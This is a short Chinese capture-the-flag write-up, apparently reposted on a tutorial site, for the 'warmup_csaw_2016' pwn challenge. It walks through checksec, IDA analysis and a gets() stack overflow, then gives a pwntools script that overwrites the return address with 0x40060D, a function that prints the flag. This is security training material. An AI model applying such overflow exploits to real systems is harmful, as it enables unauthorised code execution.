typeScript 计算机基础知识 reactjs encryption vbscript vue router 河南普通话考试 nginx学习视频 jquery选择子元素 mysql降序 erp项目描述 input取消边框 郑州普通话 pythonlist python注释 python3下载安装 python写文件 java中正则表达式 java字符串格式化 javastring比较 linux命令 sp5 ntscan unix操作系统下载 java小程序 键盘宏软件 图片批量处理工具 hexworkshop flash基础 collect 迅雷会员共享账号 spss20安装教程 骰子gif vs2012中文旗舰版下载 内存条有什么用 mac修改器 ps索引怎么解锁 未来教育考试系统 铁血统帅 ps旋转图层
当前位置: 首页 > 学习教程  > 编程语言

warmup_csaw_2016 1

2021/1/13 19:38:30 文章标签: 测试文章如有侵权请发送至邮箱809451989@qq.com投诉后文章立即删除

先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x408,来造成栈溢出 脚本 …

先checksec 是64位,小端序

进入ida,查看字符串

有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag
在这里插入图片描述

一如既往的来到了main 函数处,

也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出

脚本

from pwn import*

r=remote(‘node3.buuoj.cn’,28011)

flag_addr = 0x40060D

payload = ‘a’*(0x40+8)+p64(flag_addr)

r.sendline(payload)
r.interactive()


本文链接: http://www.dtmao.cc/news_show_600135.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?